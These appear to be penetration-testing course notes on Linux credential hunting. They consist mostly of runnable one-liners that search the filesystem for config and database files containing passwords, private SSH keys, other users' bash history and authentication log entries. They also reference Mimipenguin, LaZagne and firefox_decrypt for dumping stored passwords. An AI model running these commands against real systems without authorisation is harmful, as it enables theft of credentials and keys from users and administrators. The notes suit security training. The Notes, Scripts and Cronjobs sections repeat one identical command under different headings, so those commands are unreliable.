Credential Hunting

Files	History	Memory	Key-Rings
Configs	Logs	Cache	Browser stored credentials
Databases	Command-line History	In-memory Processing
Notes
Scripts
Source codes
Cronjobs
SSH Keys

Files

Configuration Files

• Usually ends in .conf, .cnf, .config

cry0l1t3@unixclient:~$ for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done

cry0l1t3@unixclient:~$ for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc\|lib");do echo -e "\nFile: " $i; grep "user\|password\|pass" $i 2>/dev/null | grep -v "\#";done

Databases

cry0l1t3@unixclient:~$ for l in $(echo ".sql .db .*db .db*");do echo -e "\nDB File extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share\|man";done

Notes

cry0l1t3@unixclient:~$ find /home/* -type f -name "*.txt" -o ! -name "*.*"

Scripts

cry0l1t3@unixclient:~$ find /home/* -type f -name "*.txt" -o ! -name "*.*"

Cronjobs

cry0l1t3@unixclient:~$ find /home/* -type f -name "*.txt" -o ! -name "*.*"

SSH Keys

Private Keys

cry0l1t3@unixclient:~$ grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1"

Public Keys

cry0l1t3@unixclient:~$ grep -rnw "ssh-rsa" /home/* 2>/dev/null | grep ":1"

History

Bash History

cry0l1t3@unixclient:~$ tail -n5 /home/*/.bash*

Logs

• Application Logs, Event Logs, Service Logs, System Logs

/var/log/messages	Generic system activity logs.
/var/log/syslog	Generic system activity logs.
/var/log/auth.log	(Debian) All authentication related logs.
/var/log/secure	(RedHat/CentOS) All authentication related logs.
/var/log/boot.log	Booting information.
/var/log/dmesg	Hardware and drivers related information and logs.
/var/log/kern.log	Kernel related warnings, errors and logs.
/var/log/faillog	Failed login attempts.
/var/log/cron	Information related to cron jobs.
/var/log/mail.log	All mail server related logs.
/var/log/httpd	All Apache related logs.
/var/log/mysqld.log	All MySQL server related logs.

cry0l1t3@unixclient:~$ for i in $(ls /var/log/* 2>/dev/null);do GREP=$(grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs" $i 2>/dev/null); if [[ $GREP ]];then echo -e "\n#### Log file: " $i; grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs" $i 2>/dev/null;fi;done

Memory and Cache

Mimipenguin (requires root)

GitHub - huntergregal/mimipenguin: A tool to dump the login password from the current linux userGitHub

LaZagne

GitHub - AlessandroZ/LaZagne: Credentials recovery projectGitHub

Browsers

Firefox Stored Credentials

$ ls -l .mozilla/firefox/ | grep default 

Decrypting Firefox Stored Credentials

git clone https://github.com/unode/firefox_decrypt.git

$ python3.9 firefox_decrypt.py

Using LaZagne

$ python3 laZagne.py browsers